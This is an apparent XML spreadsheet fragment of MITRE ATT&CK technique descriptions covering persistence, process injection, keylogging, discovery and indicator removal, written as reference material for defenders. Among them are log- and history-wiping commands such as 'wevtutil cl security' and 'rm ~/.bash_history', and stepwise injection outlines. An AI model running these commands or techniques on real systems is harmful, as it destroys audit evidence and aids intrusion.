    <s v="Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  _x000a__x000a_Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. _x000a__x000a_An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges."/>
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. "/>
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
    <s v="Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; file and can be modified using the &lt;code&gt;defaults&lt;/code&gt; command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) _x000a__x000a_Adversaries can add or insert a path to a malicious script in the &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt; file, using the &lt;code&gt;LoginHook&lt;/code&gt; or &lt;code&gt;LogoutHook&lt;/code&gt; key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)_x000a__x000a_**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "/>
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
    <s v="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_x000a_ _x000a_Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary."/>
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
    <s v="Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify._x000a__x000a_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_x000a__x000a_Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)_x000a__x000a_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
  </r>
  <r>
    <x v="20"/>
    <x v="7"/>
    <s v="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Citation: Startup Items)_x000a__x000a_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_x000a__x000a_An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user."/>
  </r>
  <r>
    <x v="21"/>
    <x v="2"/>
    <s v="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
  </r>
  <r>
    <x v="22"/>
    <x v="8"/>
    <s v="Adversaries may passivel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_x000a__x000a_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_x000a__x000a_Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment._x000a__x000a_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_x000a__x000a_On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)"/>
  </r>
  <r>
    <x v="23"/>
    <x v="5"/>
    <s v="Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications."/>
  </r>
  <r>
    <x v="24"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well._x000a__x000a_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
  </r>
  <r>
    <x v="25"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default”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
  </r>
  <r>
    <x v="26"/>
    <x v="5"/>
    <s v="Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  _x000a__x000a_Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. _x000a__x000a_[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_x000a__x000a_Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009)."/>
  </r>
  <r>
    <x v="26"/>
    <x v="5"/>
    <s v="Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. _x000a__x000a_Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. _x000a__x000a_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
  </r>
  <r>
    <x v="26"/>
    <x v="5"/>
    <s v="Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. _x000a__x000a_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_x000a__x000a_Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. "/>
  </r>
  <r>
    <x v="26"/>
    <x v="5"/>
    <s v="Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)_x000a__x000a_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
  </r>
  <r>
    <x v="27"/>
    <x v="4"/>
    <s v="Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. _x000a__x000a_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_x000a__x000a_Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), &quot;net use,&quot; and &quot;net session&quot; with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to &quot;net session&quot;. Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. &lt;code&gt;show ip sockets&lt;/code&gt;, &lt;code&gt;show tcp brief&lt;/code&gt;).(Citation: US-CERT-TA18-106A)"/>
  </r>
  <r>
    <x v="28"/>
    <x v="5"/>
    <s v="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
  </r>
  <r>
    <x v="28"/>
    <x v="5"/>
    <s v="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
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)_x000a__x000a_On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the &lt;code&gt;at.allow&lt;/code&gt; file. If the &lt;code&gt;at.allow&lt;/code&gt; file does not exist, the &lt;code&gt;at.deny&lt;/code&gt; file is checked. Every username not listed in &lt;code&gt;at.deny&lt;/code&gt; is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the &lt;code&gt;at.deny&lt;/code&gt; exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)_x000a__x000a_Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM)._x000a__x000a_In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)"/>
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques)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_x000a__x000a_An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). "/>
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="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Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)_x000a__x000a_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_x000a__x000a_Adversaries may also create &quot;hidden&quot;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
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="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Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)_x000a__x000a_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_x000a__x000a_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Citation: Falcon Sandbox smp: 28553b3a9d)"/>
  </r>
  <r>
    <x v="29"/>
    <x v="10"/>
    <s v="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_x000a__x000a_In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)"/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="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_x000a__x000a_There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. _x000a__x000a_More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  _x000a__x000a_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_x000a__x000a_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_x000a__x000a_Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's &lt;code&gt;AddressOfEntryPoint&lt;/code&gt; before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) _x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  _x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_A variation of APC injection, dubbed &quot;Early Bird injection&quot;,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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) _x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  _x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)_x000a__x000a_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_x000a__x000a_Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):_x000a__x000a_* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction._x000a_* Load – Create a shared section of memory and load the malicious executable._x000a_* Rollback – Undo changes to original executable, effectively removing malicious code from the file system._x000a_* Animate – Create a process from the tainted section of memory and initiate execution._x000a__x000a_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
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  "/>
  </r>
  <r>
    <x v="30"/>
    <x v="11"/>
    <s v="Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process._x000a__x000a_List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a &lt;code&gt;SysListView32&lt;/code&gt; control._x000a__x000a_ListPlanting (a form of message-passing &quot;shatter attack&quot;) may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the &lt;code&gt;SysListView32&lt;/code&gt; child of the victim process window (via Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt; and/or &lt;code&gt;EnumWindows&lt;/code&gt;) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods._x000a__x000a_Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored &lt;code&gt;WriteProcessMemory&lt;/code&gt; function. For example, an adversary can use the &lt;code&gt;PostMessage&lt;/code&gt; and/or &lt;code&gt;SendMessage&lt;/code&gt; API functions to send &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) _x000a__x000a_Finally, the payload is triggered by sending the &lt;code&gt;LVM_SORTITEMS&lt;/code&gt; message to the &lt;code&gt;SysListView32&lt;/code&gt; child of the process window, with the payload within the newly allocated buffer passed and executed as the &lt;code&gt;ListView_SortItems&lt;/code&gt; callback."/>
  </r>
  <r>
    <x v="31"/>
    <x v="12"/>
    <s v="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
  </r>
  <r>
    <x v="31"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:_x000a__x000a_* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data._x000a_* Reading raw keystroke data from the hardware buffer._x000a_* Windows Registry modifications._x000a_* Custom drivers._x000a_* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) "/>
  </r>
  <r>
    <x v="31"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)_x000a__x000a_Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data."/>
  </r>
  <r>
    <x v="31"/>
    <x v="12"/>
    <s v="Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service._x000a__x000a_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
  </r>
  <r>
    <x v="31"/>
    <x v="12"/>
    <s v="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_x000a__x000a_* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)_x000a_* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)_x000a_* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)_x000a_"/>
  </r>
  <r>
    <x v="32"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)"/>
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005)._x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk._x000a__x000a_A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e &quot;script here&quot;&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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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Citation: Zscaler APT31 Covid-19 October 2020)_x000a__x000a_Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors."/>
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies._x000a__x000a_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
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)_x000a__x000a_Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)_x000a__x000a_These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)"/>
  </r>
  <r>
    <x v="33"/>
    <x v="9"/>
    <s v="Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (&lt;code&gt;.lua&lt;/code&gt;), or from Lua-embedded programs (through the &lt;code&gt;struct lua_State&lt;/code&gt;).(Citation: Lua main page)(Citation: Lua state)_x000a__x000a_Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)"/>
  </r>
  <r>
    <x v="34"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="35"/>
    <x v="4"/>
    <s v="Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions._x000a__x000a_Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)"/>
  </r>
  <r>
    <x v="35"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups."/>
  </r>
  <r>
    <x v="35"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups."/>
  </r>
  <r>
    <x v="35"/>
    <x v="4"/>
    <s v="Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a__x000a_With administrator privileges, the event logs can be cleared with the following utility commands:_x000a__x000a_* &lt;code&gt;wevtutil cl system&lt;/code&gt;_x000a_* &lt;code&gt;wevtutil cl application&lt;/code&gt;_x000a_* &lt;code&gt;wevtutil cl security&lt;/code&gt;_x000a__x000a_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_x000a__x000a_Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`."/>
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages_x000a_* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs_x000a_* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records_x000a_* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs_x000a_* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs_x000a_* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs_x000a_* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs_x000a_"/>
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  _x000a__x000a_Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (&lt;code&gt;clear logging&lt;/code&gt; and/or &lt;code&gt;clear history&lt;/code&gt;).(Citation: US-CERT-TA18-106A)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files._x000a__x000a_Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)_x000a__x000a_Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)_x000a__x000a_Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)_x000a__x000a_Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)"/>
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;_x000a__x000a_Windows may also store information about recent RDP connections in files such as &lt;code&gt;C:\Users\\%username%\Documents\Default.rdp&lt;/code&gt; and `C:\Users\%username%\AppData\Local\Microsoft\Terminal_x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="36"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)"/>
  </r>
